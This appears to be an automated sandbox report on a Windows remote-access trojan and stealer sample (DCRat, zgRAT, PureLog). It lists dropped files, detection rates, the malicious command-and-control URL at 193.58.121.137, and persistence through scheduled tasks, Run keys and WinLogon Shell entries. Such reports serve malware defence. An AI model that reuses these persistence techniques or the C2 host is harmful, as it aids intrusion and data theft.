                                    C:\Users\user\Desktop\GTFZlGXP.log100%Joe Sandbox ML
                                    C:\ProgramData\SoftwareDistribution\cmd.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ProgramData\SoftwareDistribution\cmd.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\AEzAQzJw.log17%ReversingLabs
                                    C:\Users\user\Desktop\BjUpXdep.log25%ReversingLabs
                                    C:\Users\user\Desktop\BpLaswaY.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\CXEIeahW.log17%ReversingLabs
                                    C:\Users\user\Desktop\FrRytwYk.log8%ReversingLabs
                                    C:\Users\user\Desktop\GTFZlGXP.log8%ReversingLabs
                                    C:\Users\user\Desktop\JVsHHpbK.log5%ReversingLabs
                                    C:\Users\user\Desktop\JmTPAbOe.log21%ReversingLabs
                                    C:\Users\user\Desktop\KAZQIQEM.log21%ReversingLabs
                                    C:\Users\user\Desktop\KVMxlGUc.log16%ReversingLabs
                                    C:\Users\user\Desktop\LSnFHGjW.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\NDzgjDBy.log8%ReversingLabs
                                    C:\Users\user\Desktop\PIewODkQ.log8%ReversingLabs
                                    C:\Users\user\Desktop\QCZpVjcx.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\RCtfAzVO.log21%ReversingLabs
                                    C:\Users\user\Desktop\RTAxOVPQ.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\RrReMzQm.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\SIrnFmDG.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\SzUnVzkJ.log25%ReversingLabs
                                    C:\Users\user\Desktop\TnEFcwnq.log16%ReversingLabs
                                    C:\Users\user\Desktop\WGSwrSeE.log17%ReversingLabs
                                    C:\Users\user\Desktop\WmSvTfGg.log17%ReversingLabs
                                    C:\Users\user\Desktop\XDtENRtz.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\bZkuwcVU.log8%ReversingLabs
                                    C:\Users\user\Desktop\bhUNaLwZ.log25%ReversingLabs
                                    C:\Users\user\Desktop\cNoChqRS.log9%ReversingLabs
                                    C:\Users\user\Desktop\dwWdpxyo.log29%ReversingLabs
                                    C:\Users\user\Desktop\fplMbujm.log9%ReversingLabs
                                    C:\Users\user\Desktop\gVlLDILN.log21%ReversingLabs
                                    C:\Users\user\Desktop\hJqUpVHL.log12%ReversingLabs
                                    C:\Users\user\Desktop\iXYuZrQJ.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\iaQciIuf.log12%ReversingLabs
                                    C:\Users\user\Desktop\jXskDIJa.log5%ReversingLabs
                                    C:\Users\user\Desktop\lZeSZrOV.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\oGeTRkCA.log25%ReversingLabs
                                    C:\Users\user\Desktop\qVgkgWEP.log8%ReversingLabs
                                    C:\Users\user\Desktop\sfNsKLIr.log25%ReversingLabs
                                    C:\Users\user\Desktop\spksuybo.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\vIyiJTTD.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\vwiBQQWj.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\wwCruhPB.log25%ReversingLabs
                                    C:\Users\user\Desktop\zepZsevX.log29%ReversingLabs
                                    C:\hyperComponentFontDhcp\Mscommon.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
                                    SourceDetectionScannerLabelLink
                                    http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php100%Avira URL Cloudmalware
                                    http://193.58.121.1370%Avira URL Cloudsafe
                                    http://193.58.H:0%Avira URL Cloudsafe
                                    http://193.58.H0%Avira URL Cloudsafe
                                    http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Gam0%Avira URL Cloudsafe
                                    No contacted domains info
                                    NameMaliciousAntivirus DetectionReputation
                                    http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.phptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabcmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drfalse
                                      high
                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFxu1yHoHXYs.33.drfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.comcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designersGcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/ac/?q=cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drfalse
                                                high
                                                http://www.fontbureau.com/designers/?cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/bThecmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icocmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drfalse
                                                      high
                                                      http://193.58.Hcmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers?cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Gamcmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003697000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drfalse
                                                          high
                                                          http://www.tiro.comcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drfalse
                                                              high
                                                              http://www.fontbureau.com/designerscmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016cmd.exe, 00000021.00000002.2960240570.0000000013934000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.drfalse
                                                                  high
                                                                  http://193.58.121.137cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003697000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17cmd.exe, 00000021.00000002.2960240570.0000000013934000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.drfalse
                                                                    high
                                                                    http://www.goodfont.co.krcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.ecosia.org/newtab/cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drfalse
                                                                        high
                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brxu1yHoHXYs.33.drfalse
                                                                          high
                                                                          http://go.miccmd.exe, 0000002D.00000002.2713123527.00000000009D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.carterandcone.comlcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.sajatypeworks.comcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.typography.netDcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ac.ecosia.org/autocomplete?q=cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drfalse
                                                                                    high
                                                                                    http://www.fontbureau.com/designers/cabarga.htmlNcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.founder.com.cn/cn/cThecmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.galapagosdesign.com/staff/dennis.htmcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.founder.com.cn/cncmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.com/designers/frere-user.htmlcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installcmd.exe, 00000021.00000002.2960240570.000000001390F000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.drfalse
                                                                                                high
                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drfalse
                                                                                                  high
                                                                                                  http://www.jiyu-kobo.co.jp/cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.galapagosdesign.com/DPleasecmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.fontbureau.com/designers8cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.fonts.comcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.sandoll.co.krcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.mozilla.orgxu1yHoHXYs.33.drfalse
                                                                                                              high
                                                                                                              http://www.urwpp.deDPleasecmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplescmd.exe, 00000021.00000002.2960240570.000000001390F000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.drfalse
                                                                                                                  high
                                                                                                                  http://www.zhongyicts.com.cncmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMscommon.exe, 00000008.00000002.2004012692.00000000036BA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.sakkal.comcmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drfalse
                                                                                                                          high
                                                                                                                          http://193.58.H:cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          193.58.121.137
                                                                                                                          unknownGermany
                                                                                                                          210017DCHASSELTBEtrue
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1583905
                                                                                                                          Start date and time:2025-01-03 20:46:07 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 9m 42s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:46
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Sample name:kJrNOFEGbQ.exe
                                                                                                                          renamed because original name is a hash value
                                                                                                                          Original Sample Name:36bbafbd00e62a37070764eb4ed93308.exe
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winEXE@51/81@0/1
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 20%
                                                                                                                          HCA Information:Failed
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.56.254.164, 13.107.246.45
                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                          • Execution Graph export aborted for target cmd.exe, PID 7572 because it is empty
                                                                                                                          • Execution Graph export aborted for target cmd.exe, PID 7808 because it is empty
                                                                                                                          • Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 3868 because it is empty
                                                                                                                          • Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 5252 because it is empty
                                                                                                                          • Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 7096 because it is empty
                                                                                                                          • Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 7280 because it is empty
                                                                                                                          • Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 7576 because it is empty
                                                                                                                          • Execution Graph export aborted for target ruRRsbcJNKBbiFjvLZZICNpuYz.exe, PID 7960 because it is empty
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: kJrNOFEGbQ.exe
                                                                                                                          TimeTypeDescription
                                                                                                                          14:47:39API Interceptor6774x Sleep call for process: cmd.exe modified
                                                                                                                          19:47:31Task SchedulerRun new task: cmd path: "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                          19:47:31Task SchedulerRun new task: cmdc path: "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                          19:47:31Task SchedulerRun new task: ruRRsbcJNKBbiFjvLZZICNpuYz path: "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                          19:47:31Task SchedulerRun new task: ruRRsbcJNKBbiFjvLZZICNpuYzr path: "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                          19:47:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                          19:47:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                          19:47:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                          19:47:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                          19:48:06AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run cmd "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                          19:48:15AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ruRRsbcJNKBbiFjvLZZICNpuYz "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                          19:48:33AutostartRun: WinLogon Shell "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                                                                                                          19:48:41AutostartRun: WinLogon Shell "C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                          19:48:50AutostartRun: WinLogon Shell "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                          19:48:59AutostartRun: WinLogon Shell "C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                          19:49:07AutostartRun: WinLogon Shell "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          193.58.121.137VqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            No context
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            DCHASSELTBEVqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                            • 193.58.121.137
                                                                                                                            jIEphdoV3v.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.58.121.250
                                                                                                                            jIEphdoV3v.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.58.121.250
                                                                                                                            kdbG0dSi8w.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.58.121.250
                                                                                                                            kdbG0dSi8w.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.58.121.250
                                                                                                                            uZgbejeJkT.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.58.121.250
                                                                                                                            ni2OwV1y9u.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.58.121.250
                                                                                                                            AV4b38nlhN.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.58.121.250
                                                                                                                            AV4b38nlhN.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 193.58.121.250
                                                                                                                            WYU9WnEMkg.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 193.58.122.184
                                                                                                                            No context
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeVqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                              C:\ProgramData\SoftwareDistribution\cmd.exeVqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeVqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:ASCII text, with very long lines (517), with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):517
                                                                                                                                  Entropy (8bit):5.873117521822196
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:F2yyeGyMrlTNr0UmRRIIAtfvqMPpJvxnr2kBaXdmYDn:IeGyM70UmzKDHNr23LDn
                                                                                                                                  MD5:A8465397C142EE252E812C00371A3F56
                                                                                                                                  SHA1:271198D9C75C4A05848BE4C913BBBC0624DE577E
                                                                                                                                  SHA-256:265916077D56951306FD15942D4939CD5A270F736F9E7D627315980A8E6C7AE4
                                                                                                                                  SHA-512:2F616CE645B75DBC599ADEA6AA15000420503EC8EAD326CF5102683798B8356FCCD2E8A9B198369F658669266ED17C88486DDA16ACF3D00D9E4CC76FA4EA57DB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:7ccCBrkIA9InzkgT5oLobPR7A4JgJNP54PQQWgKkc2KH2yGbOy0yzkDrKfBHhD8wuNtjUP6ZelLjFJELxsSVWaFULiG1eCCZ4XXoFhG82bUNYemAa0TzumZTIYXwJE4bjworwZGPlUc5G15r5FbosMoR7EgqKUyyg3om05OAtEOaKeNQdq0DmQsWHWts3ZFQfoZMNS0A1b4o8NHd0QNdevLQKRfdMgHU875fEACKz0MLVDY4OP1mLmwudJC6xWyUUkqBSmZzOCnoi94H3lP6oeIWLKB58GXdB11vXXlmzBYJ8HLdO4DMH1pzcUzIke1HpKmqIJtf9nGnG9YD8hqDCKVKLBTDhdBVKQdxfeVFKhMeuCtc5wJDxxFeycfG0q8gludzfkidMk2f71ZJS0HvU8iWL88D9OPeiq2Aj37VNp0N4jg7CVy9jNMnMGoglfe7VY6R9ZkY3vhoHVclcBAoaP4VeOxcOatsL31fnP7nvZGxphg1nDEjezgGdkxulHKcBzdNd
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):3680256
                                                                                                                                  Entropy (8bit):7.823453943837237
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:vlztQegrSsUqI0m8MB/KENN6y5AhjJqbLF1FZbEPhE25hCyASkzEQWwZ4IU5/Rri:vly2pM7ENt5adqvzEhtsyAgQWwZWnpI
                                                                                                                                  MD5:C47F34E03D2A705E84CCB97C250966F2
                                                                                                                                  SHA1:77C3F5F6B13A267C76D5D716FC568F243C5606EE
                                                                                                                                  SHA-256:FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
                                                                                                                                  SHA-512:0863F1B96AA8CAACA8279A983F3143EC943AB1042D4290F53AE3226E61A71C5C3FE5EC56F57B6126F00EAE171D947861796A28533C308A62F6A30EF466896DFA
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e................. 8.........~>8.. ...@8...@.. ........................8...........@.................................0>8.K....@8.p....................`8...................................................... ............... ..H............text.....8.. ... 8................. ..`.rsrc...p....@8......"8.............@....reloc.......`8......&8.............@..B................`>8.....H..................h........b-..=8......................................0..........(.... ........8........E........N...*.......8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8y......0.......... ........8........E....................o.......8....~....:.... ....~....{....:....& ....8........~....(I...~....(M... ....<.... ....~....{....9....& ....8t......... ....~....{....:Z...& ....8O...~....(A... .... .... ....s...
                                                                                                                                  Process:C:\hyperComponentFontDhcp\Mscommon.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
